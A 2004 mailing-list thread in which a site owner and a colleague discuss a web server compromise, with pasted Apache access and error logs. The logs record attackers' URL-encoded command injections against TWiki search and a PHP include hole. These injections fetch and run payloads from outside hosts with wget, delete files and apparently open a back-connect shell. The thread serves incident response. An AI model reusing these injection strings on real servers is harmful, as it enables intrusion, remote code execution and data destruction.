My website was hacked! (fwd)

[david at thekramers.net (David Kramer)]

On Wed, 24 Nov 2004, Steve Seremeth wrote:

> David Kramer wrote:
> 
> >Anything else I should try?
> >
> >Should I panic more than I am?  Right now I feel strongly this was a 
> >benign "stupid Apache tricks" thing, and I need to find the hole and close 
> >it, but no need to nuke the server and start over.
> >
> >  
> >
> To add to my off-list comments...
> 
> I'm a little hazy on the details as this was a while ago, but here's 
> what we found after the hacker had exploited a _known_ gaping hole in a 
> php app one of our users was running:
> * They had dropped a false shell into /var/tmp that ran under the apache 
> user -- I think it listened on some funny port - and we discovered it 
> when we went to bounce apache and got some weird message
> * They tried to compile an irc bot (go figure)
> * Apache logs had the evidence:
> Several instances of this:
> ./log/access_log:203.130.222.150 - - [12/Jan/2004:19:29:10 -0800] "GET 
> /pm_inc.php?pm_path=http://www.delhill.net/_borders/&cahyo=cd%20/var/tmp%20;%20wget%20exploiter.info/tools/mx 
> HTTP/1.1" 200 188 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; 
> DigExt)"
> 
> Nasty.
> 
> I ran chkrootkit and it didn't find anything.  I also did checksums 
> against a lot of local binaries compared to known good ones to make sure 
> they were the originals.
>  
> I bet you are right that it's an apache-only thing, but I would be 
> _really_ sure.  I would also leave apache (and perhaps other daemons as 
> well) down until you are sure you found the problem.  Our offender came 
> back once or twice more unsuccessfully.


I think I found it.  I'm running TWiki, and at that time there were some 
really nasty things happening in access_log and error_log.


Access_log:
200.175.37.89 - - [23/Nov/2004:22:59:19 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28uname+-a%3B+id%3Bpwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29\
%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 5067
66.196.91.123 - - [23/Nov/2004:22:59:55 -0500] "GET 
/docs/php/functions.html HTTP/1.0" 304 -
200.175.37.89 - - [23/Nov/2004:22:59:57 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bls%29+%7C+sed+%27s%2F%5C%28.*\
%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 20131
200.175.37.89 - - [23/Nov/2004:23:00:31 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Bls%29+%7C+sed+%27\
s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 58706
65.54.188.63 - - [23/Nov/2004:23:00:44 -0500] "GET 
/phpdemo/manual/function.asort.html HTTP/1.0" 200 3905
200.175.37.89 - - [23/Nov/2004:23:00:56 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+htdocs%3Brm+-rf+*index*%3B\
ls+*index*%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 3058
200.175.37.89 - - [23/Nov/2004:23:01:48 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+www.gigachat.net%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 305\
9
66.196.90.228 - - [23/Nov/2004:23:02:13 -0500] "GET /robots.txt HTTP/1.0" 
404 282
65.54.188.63 - - [23/Nov/2004:23:02:29 -0500] "GET 
/phpdemo/manual/function.xmldoc.html HTTP/1.0" 200 2314
66.196.90.245 - - [23/Nov/2004:23:02:59 -0500] "GET 
/twiki/bin/view/TWiki/TWikiMetaData HTTP/1.0" 200 18571
65.54.188.63 - - [23/Nov/2004:23:04:05 -0500] "GET 
/phpdemo/manual/function.rewinddir.html HTTP/1.0" 200 2208
200.212.114.3 - - [23/Nov/2004:23:04:40 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 3051
200.212.114.3 - - [23/Nov/2004:23:05:02 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%\
7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 3013
200.212.114.3 - - [23/Nov/2004:23:05:47 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bpwd%\
29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 3570
65.54.188.63 - - [23/Nov/2004:23:05:55 -0500] "GET 
/phpdemo/manual/function.mssql-close.html HTTP/1.0" 200 3033
66.196.91.132 - - [23/Nov/2004:23:05:57 -0500] "GET 
/phpdemo/manual/function.cpdf-show-xy.html HTTP/1.0" 304 -
200.212.114.3 - - [23/Nov/2004:23:06:17 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fcgi%3Bchmod+777+cgi%3B.%2Fcgi%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 \
3750
200.212.114.3 - - [23/Nov/2004:23:07:21 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1" 200 4868
66.196.90.105 - - [23/Nov/2004:23:07:28 -0500] "GET 
/docs/php/function.mcve-ub.html HTTP/1.0" 304 -
65.54.188.63 - - [23/Nov/2004:23:07:29 -0500] "GET 
/phpdemo/manual/function.sem-acquire.html HTTP/1.0" 200 2871
66.26.157.9 - - [23/Nov/2004:23:07:33 -0500] "GET /phpdemo/phpvscgi.html 
HTTP/1.1" 200 4109
200.212.114.3 - - [23/Nov/2004:23:07:47 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28cd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+..%3Bcd+tmp%3Bwget\
+bandits.webm.ru%2Fxpl%2Fdc.pl%3Bperl+dc.pl+200.193.15.61+4%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 
HTTP/1.1"\
 200 7178
200.212.114.3 - - [23/Nov/2004:23:08:11 -0500] "GET 
/twiki/bin/search/Know/?scope=text&search=doesnotexist1%27%3B+%28pwd%29+%7C+sed+%27s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1_\
_END__.txt%2F%27%3B+fgrep+-i+-l+--+%27doesnotexist2 HTTP/1.1" 200 3593
65.




error_log:
[Tue Nov 23 20:18:13 2004] statistics: Use of uninitialized value in 
concatenation (.) or string at ../lib/TWiki.pm line 528.
.
.
.
[Tue Nov 23 22:08:46 2004] [error] PHP Warning:  main(/top.inc) [<a 
href='http://thekramers.net/docs/php/function.main.html'>function.main.html</a>]: 
failed to open stream: No such file or directory in /srv/www/htdocs/tmp/20010708/index.phtml 
on line 5
[Tue Nov 23 22:08:46 2004] [error] PHP Fatal error:  main() [<a 
href='http://thekramers.net/docs/php/function.require.html'>function.require.html</a>]: 
Failed opening req\
uired '/top.inc' (include_path='.:/usr/share/php') in 
/srv/www/htdocs/tmp/20010708/index.phtml on line 5
[Tue Nov 23 22:34:11 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
.
.
.
[Tue Nov 23 23:02:13 2004] [error] [client 66.196.90.228] File does not 
exist: /srv/www/twiki/robots.txt
[Tue Nov 23 23:02:58 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:04:39 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:02 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
sh: -c: line 2: syntax error: unexpected end of file
[Tue Nov 23 23:05:46 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
[Tue Nov 23 23:06:14 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
--23:06:15--  http://bandits.webm.ru/xpl/cgi
           => `cgi'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,032 [text/plain]

    0K .......... ......                                     100%   37.46 
KB/s

23:06:16 (37.46 KB/s) - `cgi' saved [17032/17032]

[Tue Nov 23 23:07:20 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
--23:07:20--  http://bandits.webm.ru/xpl/dc.pl
           => `dc.pl'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]

    0K                                                       100%  711.91 
KB/s

23:07:21 (711.91 KB/s) - `dc.pl' saved [729/729]

[Tue Nov 23 23:07:45 2004] [notice] cannot use a full or relative URL in a 
401 ErrorDocument directive --- ignoring!
--23:07:46--  http://bandits.webm.ru/xpl/dc.pl
           => `dc.pl.1'
Resolving bandits.webm.ru... done.
Connecting to bandits.webm.ru[82.151.99.20]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [text/plain]

    0K                                                       100%  711.91 
KB/s

23:07:46 (711.91 KB/s) - `dc.pl.1' saved [729/729]




I will also note that the "bandits.webm.ru" website contains one phrase, 
in Russian: "Soon it will begin..."


I'm going to disable TWiki for now.


	


---------------------------------------------------------------------------
DDDD   David Kramer Partner, Agile Rules          
http://www.agilerules.com
DK KD  162 Marett Road  Lexington, MA 02421       davidk at agilerules.com
DKK D  
DK KD  Specializing in coaching and development in Agile/XP practices 
DDDD   and embedded software development